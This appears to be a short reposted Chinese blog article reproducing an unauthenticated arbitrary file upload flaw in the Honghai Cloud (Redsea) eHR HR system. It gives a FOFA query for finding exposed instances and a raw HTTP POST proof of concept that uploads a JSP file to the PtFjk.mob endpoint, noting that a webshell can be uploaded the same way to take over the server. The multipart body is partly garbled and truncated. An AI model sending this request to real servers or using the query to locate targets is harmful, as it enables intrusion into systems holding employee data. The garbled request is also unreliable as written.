本文主要是介绍红海云eHR 任意文件上传漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
红海eHR是大中型企业广泛采用人力资源管理系统。红海云是国内顶尖的HR软件供应商,是新一代eHR系统的领导者。
0x02 漏洞概述
红海云EHR系统PtFjk.mob接口处存在未授权文件上传漏洞,攻击者可上传webshell来命令执行,获取服务器权限。
0x03 复现环境
FOFA:body="/RedseaPlatform/skins/images/favicon.ico"
0x04 漏洞复现
PoC
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg<% out.print("hello,eHR");%>
------Web
这篇关于红海云eHR 任意文件上传漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!